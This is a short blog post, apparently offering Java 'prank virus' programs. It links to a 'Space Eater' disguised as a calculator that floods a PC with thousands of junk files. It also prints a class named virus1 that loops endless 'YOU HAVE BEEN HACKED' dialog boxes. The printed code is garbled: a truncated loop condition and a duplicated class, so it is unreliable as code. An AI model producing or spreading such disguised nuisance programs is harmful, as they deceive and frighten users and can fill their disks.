Space Eater in java
download the code from here...
Create 1000 files/second
It looks like a calculator but when you explore your pc you will find tousands of junk files are created!!!!!
Create Unclosable popup in java
//Its just kind of fun ,the dialogbox never closes.I assure you this is not harmful for your pc .
import javax.swing.JOptionPane;
class virus1
{
public static void main()
{
int x=0;
int y=4;
while(x{
JOptionPane.showConfirmDialog(null,"do you want to close this virus","YOU HAVE BEEN HACKED",JOptionPane.YES_NO_OPTION);
}
}
}
class virus1
{
public static void main()
{
int x=0;
int y=4;
while(x
JOptionPane.showConfirmDialog(null,"do you want to close this virus","YOU HAVE BEEN HACKED",JOptionPane.YES_NO_OPTION);
}
}
}
Minesweeper codes
download here
No comments:
Post a Comment